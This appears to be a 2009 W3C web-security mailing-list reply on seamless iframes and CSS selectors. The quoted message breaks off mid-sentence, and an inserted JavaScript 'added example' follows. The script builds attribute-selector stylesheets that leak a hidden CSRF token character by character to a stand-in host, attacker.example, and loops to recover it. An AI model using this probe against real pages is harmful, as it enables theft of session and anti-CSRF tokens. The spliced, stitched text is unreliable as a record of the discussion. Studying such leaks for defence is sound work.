Re: Seamless iframes + CSS3 selectors = bad idea

From: <sird@rckc.at>
Date: Sun, 6 Dec 2009 14:58:36 +0800
Message-ID: <8ba534860912052258t23a14a99xb4ede984d9ec6f0d@mail.gmail.com>
To: Maciej Stachowiak <mjs@apple.com>
Cc: sird@rckc.at, Ian Hickson <ian@hixie.ch>, public-web-security@w3.org

IIRC sandboxed iframes can't frame.

In any case, sandboxed iframes are a joke unless you use data URIs... that
should be cross-origin anyway.

On Dec 6, 2009 2:55 PM, "Maciej Stachowiak" <mjs@apple.com> wrote:

On Dec 5, 2009, at 10:27 PM, Maciej Stachowiak wrote:

> > I think the attack is that you can injec...
OK, I thought of a possible real vulnerability. A trusted host page on the
site wants to embed some untrusted user-generated content with the ability
to modify it, so it embeds it, hosted from its own server, using <iframe
sandbox="allow-same-origin">. This should prevent scripting and plugins, so
in theory it seems safe. But the untrusted content could embed a further
iframe with the seamless flag, embedding an arbitrary document from the
hosting service. It can then use CSS selectors to probe for data in that
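The scenario Maciej sketches above, worked through as an added example (this is not code from the thread or from any browser): the untrusted document carries no script at all, only a stylesheet and a seamless child frame pointing at a same-origin page. Because a seamless frame takes its embedder's styles, the attribute selectors in that stylesheet are evaluated against the victim page's DOM, and each matching rule fires a background-image request that names the matched prefix. The attacker origin, the token alphabet, the field name and the victim markup are all assumed; the selector matcher at the bottom stands in for the browser so the script runs offline. One caveat for anyone reading this years later: the seamless attribute was subsequently dropped from the HTML specification, so the cascade step of this chain is exactly what went away.

```javascript
// Added example, not code from the mailing-list thread. It models the
// attack described in the quoted message: an untrusted, script-less
// document (embedded by the host via <iframe sandbox="allow-same-origin">)
// carries a stylesheet plus a seamless iframe of a same-origin page; since
// a seamless frame inherits the embedder's styles, CSS attribute selectors
// run against the victim DOM and leak matches as background-image requests.
// The attacker origin, alphabet, field name and victim markup are assumed.

const ALPHABET = "0123456789abcdef";               // assumed token alphabet
const COLLECTOR = "https://attacker.example/leak"; // hypothetical collector

// One probing round: for a known prefix, one rule per candidate next
// character. A rule's background-image URL is requested only when its
// selector matches, so the request itself reveals the next character.
function buildProbeStylesheet(fieldName, knownPrefix) {
  return Array.from(ALPHABET, (ch) => {
    const prefix = knownPrefix + ch;
    const url = `${COLLECTOR}?p=${encodeURIComponent(prefix)}`;
    return `input[name="${fieldName}"][value^="${prefix}"] { background-image: url("${url}"); }`;
  }).join("\n");
}

// The untrusted content itself: no <script> anywhere, which is all that a
// sandbox without allow-scripts guarantees.
function buildUntrustedContent(fieldName, knownPrefix, targetPath) {
  return [
    "<style>",
    buildProbeStylesheet(fieldName, knownPrefix),
    "</style>",
    `<iframe seamless src="${targetPath}"></iframe>`,
  ].join("\n");
}

// ---- Stand-in for the browser (there is no DOM in this script) ----------
// A page is an array of {tag, attrs}; only the selector shape the probe
// emits, input[name="…"][value^="…"], is understood.
const RULE_RE =
  /^input\[name="([^"]*)"\]\[value\^="([^"]*)"\] \{ background-image: url\("([^"]*)"\); \}$/;

function parseProbeRule(line) {
  const m = RULE_RE.exec(line);
  return m ? { fieldName: m[1], prefix: m[2], url: m[3] } : null;
}

// URLs the victim page would request once the stylesheet applies to it.
function matchingUrls(page, css) {
  const hits = [];
  for (const line of css.split("\n")) {
    const rule = parseProbeRule(line);
    if (!rule) continue;
    const matched = page.some(
      (el) =>
        el.tag === "input" &&
        el.attrs.name === rule.fieldName &&
        typeof el.attrs.value === "string" &&
        el.attrs.value.startsWith(rule.prefix)
    );
    if (matched) hits.push(rule.url);
  }
  return hits;
}

// The attacker's loop: each round's collector hit extends the known prefix
// by one character; no hit means the value is exhausted, or its next
// character lies outside ALPHABET.
function recoverValue(page, fieldName, maxLen = 64) {
  let known = "";
  while (known.length < maxLen) {
    const hits = matchingUrls(page, buildProbeStylesheet(fieldName, known));
    if (hits.length === 0) break;
    // Several hits would mean several same-named inputs; take the first.
    known = new URL(hits[0]).searchParams.get("p");
  }
  return known;
}

// Constructed victim page: a same-origin form carrying an anti-CSRF token.
const VICTIM_PAGE = [
  { tag: "form", attrs: { action: "/settings", method: "post" } },
  { tag: "input", attrs: { type: "hidden", name: "csrf_token", value: "7f3a9c" } },
  { tag: "input", attrs: { type: "text", name: "display_name", value: "alice" } },
];

const RECOVERED_TOKEN = recoverValue(VICTIM_PAGE, "csrf_token");
console.log(buildUntrustedContent("csrf_token", "", "/settings"));
console.log("recovered csrf_token:", RECOVERED_TOKEN);
```

Note what the sandbox did and did not buy here: `allow-same-origin` without `allow-scripts` removes script, but the leak never needs script, only a stylesheet the victim page ends up honouring. The recovery of `display_name` stops at "a" because the second character is outside the assumed hex alphabet, which is the usual failure mode of this class of probe.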

Received on Sunday, 6 December 2009 06:59:17 UTC